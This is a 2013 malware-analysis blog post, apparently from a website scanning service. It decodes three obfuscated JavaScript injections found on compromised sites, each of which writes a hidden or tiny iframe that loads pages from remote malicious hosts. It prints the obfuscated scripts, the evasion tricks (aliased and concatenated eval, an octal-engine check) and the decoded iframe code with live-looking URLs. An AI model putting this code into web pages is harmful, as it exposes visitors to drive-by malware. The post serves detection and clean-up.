Sunday, October 6, 2013

3 JavaScript threats generating hidden iframe(s) to compromised server(s)

Obfuscated malicious JavaScript injected into website pages generates hidden iframes that load content from remote server(s)

Background

Online Website Malware Scanner has identified malicious JavaScript code injected into the scanned website. This obfuscated code builds an iframe that is invisible to the website's visitors and uses it to load content from a remote malicious website or server.

In this post we cover 3 malicious scripts recently detected on scanned websites. Each decoded payload shown below loads a remote .html or .php file without the user's consent.

You can find analyses of similar web threats in our other posts: malicious iframes generation.

Malicious action

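Malicious iframes are often used to distribute malware hosted on external web resources (websites). In the samples below the frame is either sized to zero or a few pixels, or styled as hidden, so the visitor's browser requests the remote page without anything visible changing on the infected page.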

Sample 1 

Beautified script

  1. var wsqWQBPps ="cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2fcNRoPJdqz76cNRoPJdqz6ccNRoPJdqz71cNRoPJdqz73cNRoPJdqz72cNRoPJdqz79cNRoPJdqz79cNRoPJdqz61cNRoPJdqz63cNRoPJdqz72cNRoPJdqz2ecNRoPJdqz70cNRoPJdqz68cNRoPJdqz70cNRoPJdqz3fcNRoPJdqz76cNRoPJdqz61cNRoPJdqz6fcNRoPJdqz77cNRoPJdqz76cNRoPJdqz3dcNRoPJdqz4ecNRoPJdqz48cNRoPJdqz63cNRoPJdqz43cNRoPJdqz71cNRoPJdqz55cNRoPJdqz46cNRoPJdqz53cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz68cNRoPJdqz72cNRoPJdqz79cNRoPJdqz74cNRoPJdqz65cNRoPJdqz77cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz39cNRoPJdqz38cNRoPJdqz38cNRoPJdqz39cNRoPJdqz34cNRoPJdqz33cNRoPJdqz39cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz79cNRoPJdqz6acNRoPJdqz72cNRoPJdqz65cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz38cNRoPJdqz35cNRoPJdqz34cNRoPJdqz22cNRoPJdqz20cNRoPJdqz6ecNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz79cNRoPJdqz66cNRoPJdqz65cNRoPJdqz6acNRoPJdqz43cNRoPJdqz50cNRoPJdqz43cNRoPJdqz7acNRoPJdqz62cNRoPJdqz41cNRoPJdqz22cNRoPJdqz20cNRoPJdqz74cNRoPJdqz69cNRoPJdqz74cNRoPJdqz6ccNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz4ecNRoPJdqz65cNRoPJdqz73cNRoPJdqz58cNRoPJdqz6fcNRoPJdqz59cNRoPJdqz47cNRoPJdqz54cNRoPJdqz42cNRoPJdqz7acNRoPJdqz22cNRoPJdqz20cNRoPJdqz77cNRoPJdqz69cNRoPJdqz64cNRoPJdqz74cNRoPJdqz68cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz68cNRoPJdqz65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz6
4cNRoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e";
  2. yvDFQwwmM = eval;
  3. var WSxQJgvuB = wsqWQBPps.replace(/cNRoPJdqz/g, "%");
  4. yvDFQwwmM("document.write(unescape(WSxQJgvuB))");


Malicious payload


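The script replaces every occurrence of the filler string cNRoPJdqz with "%", which turns the long string into percent-encoded text. It then passes that text through unescape() and document.write(), calling them through an alias of eval (yvDFQwwmM) so that the word "eval" never appears next to the payload. The decoded payload injects a hidden (0x0, no border) iframe pointing to http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854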


  1. document.write( < iframe src = "http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&amp;hrytewsfd=9889439&amp;yjresfd=854"
  2.     name = "yfejCPCzbA"
  3.     title = "NesXoYGTBz"
  4.     width = "0"
  5.     height = "0"
  6.     frameborder = "0" > < /iframe>)


Blacklisting status

The website is listed as Suspicious by Google Safe Browsing - report link

Google Safe Browsing
Google Safe Browsing diagnostic report



Sample 2

Beautified script


  1. var i, y, x ="3c696672616d65207372633d22687474703a2f2f6d6f636f7265776172642e636f6d2f6672616d652f61616e2e68746d6c222077696474683d223122206865696768743d2231223e0d0a3c2f696672616d653e";
  2. = '';
  3. for (= 0; i < x.length; i += 2) {
  4.     y += unescape(
  5.         '%' + x.substr(i, 2));
  6. }
  7. document.write(y);


Malicious payload


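The script walks the hex string two characters at a time, prefixes each pair with "%" and decodes it with unescape(), then writes the result with document.write(). The assignment targets on lines 2 and 3 of the listing were lost in formatting; judging by their later use they are y and i. The decoded payload injects a 1x1 iframe pointing to http://mocoreward[.]com/frame/aan.html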


  1. <iframe src="http://mocoreward.com/frame/aan.html" width="1" height="1">
  2. </iframe>

Blacklisting status

The website is flagged by BitDefender and Sophos, according to the VirusTotal report.

VirusTotal URL analysis report
VirusTotal - URL analysis report

Sample 3

Beautified script

  1. = 3 - 1;
  2. = -1 - 1 + c;
  3. = parseInt;
  4. if (p("01" + "2" + "3") === 83) try {
  5.     Boolean()["pr" + "otot" + "ype"].q
  6. } catch (egewgsd) {
  7.     if (window.document) f = ['-32i-32i64i61i-9i-1i59i70i58i76i68i60i69i75i5i62i60i75i28i67i60i68i60i69i75i74i25i80i43i56i62i37i56i68i60i-1i-2i57i70i59i80i-2i0i50i7i52i0i82i-28i-32i-32i-32i64i61i73i56i68i60i73i-1i0i18i-28i-32i-32i84i-9i60i67i74i60i-9i82i-28i-32i-32i-32i59i70i58i76i68i60i69i75i5i78i73i64i75i60i-1i-7i19i64i61i73i56i68i60i-9i74i73i58i20i-2i63i75i75i71i17i6i6i75i59i74i11i14i5i67i70i70i66i64i69i5i56i75i6i74i75i59i74i6i62i70i5i71i63i71i22i74i64i59i20i8i-2i-9i78i64i59i75i63i20i-2i8i7i-2i-9i63i60i64i62i63i75i20i-2i8i7i-2i-9i74i75i80i67i60i20i-2i77i64i74i64i57i64i67i64i75i80i17i63i64i59i59i60i69i18i71i70i74i64i75i64i70i69i17i56i57i74i70i67i76i75i60i18i67i60i61i75i17i7i18i75i70i71i17i7i18i-2i21i19i6i64i61i73i56i68i60i21i-7i0i18i-28i-32i-32i84i-28i-32i-32i61i76i69i58i75i64i70i69i-9i64i61i73i56i68i60i73i-1i0i82i-28i-32i-32i-32i77i56i73i-9i61i-9i20i-9i59i70i58i76i68i60i69i75i5i58i73i60i56i75i60i28i67i60i68i60i69i75i-1i-2i64i61i73i56i68i60i-2i0i18i61i5i74i60i75i24i75i75i73i64i57i76i75i60i-1i-2i74i73i58i-2i3i-2i63i75i75i71i17i6i6i75i59i74i11i14i5i67i70i70i66i64i69i5i56i75i6i74i75i59i74i6i62i70i5i71i63i71i22i74i64i59i20i8i-2i0i18i61i5i74i75i80i67i60i5i77i64i74i64i57i64i67i64i75i80i20i-2i63i64i59i59i60i69i-2i18i61i5i74i75i80i67i60i5i71i70i74i64i75i64i70i69i20i-2i56i57i74i70i67i76i75i60i-2i18i61i5i74i75i80i67i60i5i67i60i61i75i20i-2i7i-2i18i61i5i74i75i80i67i60i5i75i70i71i20i-2i7i-2i18i61i5i74i60i75i24i75i75i73i64i57i76i75i60i-1i-2i78i64i59i75i63i-2i3i-2i8i7i-2i0i18i61i5i74i60i75i24i75i75i73i64i57i76i75i60i-1i-2i63i60i64i62i63i75i-2i3i-2i8i7i-2i0i18i-28i-32i-32i-32i59i70i58i76i68i60i69i75i5i62i60i75i28i67i60i68i60i69i75i74i25i80i43i56i62i37i56i68i60i-1i-2i57i70i59i80i-2i0i50i7i52i5i56i71i71i60i69i59i26i63i64i67i59i-1i61i0i18i-28i-32i-32i84'][0].split('i');
  8.     v = "e" + "va" + "l";
  9. }
  10. if (v) e = window[v];
  11. = f;
  12. = [];
  13. = String;
  14. for (; 589 != i; i += 1) {
  15.     j = i;
  16.     s = s + r["f" + "r" + "omC" + "har" + "C" + "ode"](w[j] * 1 + 41);
  17. }
  18. if (e) e(s);


Malicious payload


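The script first tests parseInt("0123") === 83, which holds only in engines that parse a leading-zero string as octal, so the decoder does not run elsewhere. It then deliberately raises an exception (Boolean()["prototype"] is undefined, so reading .q throws) and does its setup inside the catch block. There the "i"-separated integer list is split, 41 is added to each value, and the results are converted with String.fromCharCode; the decoded text is executed through window["e" + "va" + "l"]. The method names are built by string concatenation so that "eval", "prototype" and "fromCharCode" never appear literally. Several assignment targets (lines 1-3 and 11-13 of the listing) were lost in formatting. Decoded payload injects hidden iframe to http://tds47[.]lookin[.]at/stds/go.php (requested with ?sid=1 in the payload)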


  1. if (document.getElementsByTagName('body')[0]) {
  2.     iframer();
  3. } else {
  4.     document.write("<iframe src='http://tds47.lookin.at/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
  5. }
  6. function iframer() {
  7.     var f = document.createElement('iframe');
  8.     f.setAttribute('src', 'http://tds47.lookin.at/stds/go.php?sid=1');
  9.     f.style.visibility = 'hidden';
  10.     f.style.position = 'absolute';
  11.     f.style.left = '0';
  12.     f.style.top = '0';
  13.     f.setAttribute('width', '10');
  14.     f.setAttribute('height', '10');
  15.     document.getElementsByTagName('body')[0].appendChild(f);
  16. }


Blacklisting status


The website is flagged by BitDefender and Sophos, according to the VirusTotal report.

VirusTotal URL analysis report
VirusTotal - URL analysis report

Malware clean-up


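Such malware is often hidden inside a website's JavaScript files. Indicators visible in the samples above include long encoded strings fed to unescape() or String.fromCharCode(), eval reached through an alias or a concatenated name, and document.write() or createElement() producing an iframe that is tiny or hidden. If you suspect that your website has been infected by similar malware, please use Website Anti-malware Monitoring for remediation assessment.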